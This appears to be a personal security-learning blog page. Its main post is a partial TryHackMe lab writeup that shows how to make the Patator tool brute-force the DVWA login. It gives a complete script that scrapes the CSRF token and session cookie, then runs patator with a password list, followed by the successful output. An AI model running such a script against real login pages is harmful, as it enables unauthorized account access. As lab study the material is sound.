Cyber Learnings

My journey through the infosec domain

binaryrefinery (1) brute-forcing (1) C2 (1) compiler-flags (1) ethical hacking (1) go-lang (1) implant (1) javascript (1) link (1) malware-analysis (7) optimization (1) patator (1) PE-files (1) pmat (1) powershell (1) python (5) re-ctf (3) recmosrat (1) reverse-engineering (1) sysinternals (1) syswow64 (1) tryhackme (4) uwp (1) vulnerable-code (1) wannacry (1) windbg (1) windows (2) writeup (1)

  • Sysinternals Talk

    Just ran into this great post on the SentinelOne website on the history of the Sysinternals suite by none other than it’s creator – Mark Russinovich.

    https://www.sentinelone.com/labs/the-life-and-times-of-sysinternals-how-one-developer-changed-the-face-of-malware-analysis/
    , ,
    , ,
    , ,

  • TryHackMe Brute Force Heroes Partial Writeup – Trouble with Patator

    I was doing the TryHackMe Brute Force Heroes room and came across the Patator brute forcing tool. Getting it to successfully brute force the DVWA application was quite a feat for me, which led me to write this post.

    I am using my own Kali Linux attack box. These instructions may not apply if you use the THM Attack Box.

    Contrary to what the Task instructions say, I was able to get Python 3 to work pretty well with the patator tool. Using Python 2 led to a bunch of issues and wasted time.

    # create a Python 3 virtual env 
└─$ python3 -m venv env3   

# activate env3 
$ source env3/bin/activate  
┌──(env3)─(kali㉿kali)

# install pycurl 
└─$ pip install pycurl 

# test pyCurl
┌──(env3)─(kali㉿kali)-
└─$ python
Python 3.11.2 (main, Mar 13 2023, 12:18:29) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pycurl
>>> 

# Make a local copy of patator and remove the top line to force it to use the python version installed in the environment

# REMOVE THIS LINE
#!/usr/bin/python2  

# Run Patator

┌──(env3)─(kali㉿kali)
└─$ ./patatol http_fuzz method=POST url=http://$TARGET/login.php body="username=admin&password=password&Login=Login&user_token=f9e590fd1a2070c99d99e3e8a563c180" header="Cookie: PHPSESSID=0b7gcem4r4mqugpuh7bf21hfmd; security=impossible" -x quit:fgrep!=login.php
/home/kali/tryhackme/Rooms/bruteforceheroes/./patatol:2601: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
  from telnetlib import Telnet
<class '__main__.Controller_HTTP'>
13:08:45 patator    INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.11.2 at 2023-04-23 13:08 EDT
13:08:46 patator    INFO -                                                                              
13:08:46 patator    INFO - code size:clen       time | candidate                          |   num | mesg
13:08:46 patator    INFO - -------------------------------------------------------
13:08:47 patator    FAIL - xxx  70:-1          1.064 |                                    |     1 | <class 'pycurl.error'> (49, "Couldn't parse CURLOPT_RESOLVE entry ''")
13:08:48 patator    INFO - Hits/Done/Skip/Fail/Size: 0/1/0/1/1, Avg: 0 r/s, Time: 0h 0m 2s

    Add the following dummy option to the command line to get past the above error.

    resolve=target:127.0.0.1

e.g. ./patator http_fuzz method=POST resolve=target:127.0.0.1 url="http://${IP}/login.php"

    We learned from the Burp discussion that the Response header of a failed login contains Location: login.php and that of a successful password breach contains the field Location: index.php. We use this information to exclude (ignore) all responses that have login.php in the Location: field. 

    The following switch excludes the failed login responses.

    -x ignore:fgrep='Location: login.php'

    THE FINAL SCRIPT (as outlined in the Brute Forcing Patator Task)

    IP= x.x.x.x 

CSRF=$(curl -s -c dvwa.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2) 

SESSIONID=$(grep PHPSESSID dvwa.cookie | awk -F ' ' '{print $7}') 

echo "The CSRF is: $CSRF" 
echo "The PHPSESSID is: $SESSIONID" 

patator http_fuzz method=POST --threads=64 timeout=10 url="http://${IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSIONID}; security=impossible" resolve=target:127.0.0.1 -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php'

    THE CRACKED PASSWORD

    └─$ ./run.sh                   

    The CSRF is: cb8eb6397fd783c9362188fe68ee0049 

    The PHPSESSID is: cudu1518ggt4s1c7es4l4uodg3 

    /home/kali/tryhackme/Rooms/bruteforceheroes/./patator:2601: DeprecationWarning: ‘telnetlib’ is deprecated and slated for removal in Python 3.13 

     from telnetlib import Telnet 

    <class ‘__main__.Controller_HTTP’> 

    06:23:37 patator    INFO – Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.11.2 at 2023-04-23 06:23 EDT 

    06:23:37 patator    INFO –                                                                               

    06:23:37 patator    INFO – code size:clen       time | candidate                          |   num | mesg 

    06:23:37 patator    INFO – ———————————————————————–

    06:23:44 patator    INFO – 302  281:0          0.217 | [PASSWORD]                           |   807 | HTTP/1.1 302 Found 

    06:23:45 patator    INFO – Hits/Done/Skip/Fail/Size: 1/1136/0/0/1988, Avg: 148 r/s, Time: 0h 0m 7s 

    REFERENCES:

    , , ,
    ,
    , , ,